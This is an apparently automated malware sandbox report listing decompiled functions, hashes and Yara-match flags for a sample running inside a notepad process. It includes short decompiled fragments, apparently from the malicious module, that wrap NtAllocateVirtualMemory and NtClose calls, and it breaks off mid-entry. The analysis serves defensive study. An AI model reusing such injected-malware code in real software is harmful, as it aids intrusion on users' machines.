                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                  • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                  • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041A53C Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 253 41a53c-41a556 254 41a55c-41a57d NtAllocateVirtualMemory 253->254 255 41a557 call 41af60 253->255 255->254
                                                  C-Code - Quality: 75%
                                                  			E0041A53C(void* __eax, void* __ebx, void* __esi, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t16;
				void* _t25;

				asm("aas");
				_t4 = _v0 + 0xc60; // 0xca0
				E0041AF60(_t25, _v0, _t4,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30, __esi);
				_t16 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t16;
			}






                                                  0x0041a53c
                                                  0x0041a54f
                                                  0x0041a557
                                                  0x0041a579
                                                  0x0041a57d

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: c2df2180edf46e93e029bc560a7b7d18c24963d4ca06b3712f0d85bf5cccb2a3
                                                  • Instruction ID: acb896d2f926072369a8a7bb46dc4a7ee746dd0f3787bf82f06fd5323affd546
                                                  • Opcode Fuzzy Hash: c2df2180edf46e93e029bc560a7b7d18c24963d4ca06b3712f0d85bf5cccb2a3
                                                  • Instruction Fuzzy Hash: 15F0F2B6200208ABCB14DF99DC81EEB77ADAF8C654F158549BE5997242C631E911CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 256 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                  • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                  • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041A48F Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E0041A48F(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;
				void* _t12;

				asm("adc [ebp-0x75], edx");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c, _t12);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}






                                                  0x0041a48f
                                                  0x0041a493
                                                  0x0041a496
                                                  0x0041a49f
                                                  0x0041a4a7
                                                  0x0041a4b5
                                                  0x0041a4b9

                                                  APIs
                                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: c7bf09651163799e5d87b762f5c6b9a9a51a6c43893c55ed95e77720321bc510
                                                  • Instruction ID: aa8bf0814a003d25423f0b83a14965536f6cb2bfaa386fa8c0f40121678e8937
                                                  • Opcode Fuzzy Hash: c7bf09651163799e5d87b762f5c6b9a9a51a6c43893c55ed95e77720321bc510
                                                  • Instruction Fuzzy Hash: 5CE0C271600204BFD710DFA4CC45EEB7B78EF48360F14805AF90C9B242C130E5008B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                  • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                  • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AA00C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                  • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                  • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                  • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AA0078 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                  • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                  • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                  • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AA0048 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                  • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                  • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                  • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00A9F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                  • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                  • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                  • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00A9F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                  • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                  • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                  • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00A9FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                  • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                  • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                  • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00A9FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                  • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                  • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                  • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00A9FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                  • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                  • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                  • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00A9FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                  • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                  • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                  • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00A9FC90 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                  • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                  • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                  • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00A9FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                  • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                  • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                  • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00A9FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                  • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                  • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                  • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00A9FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
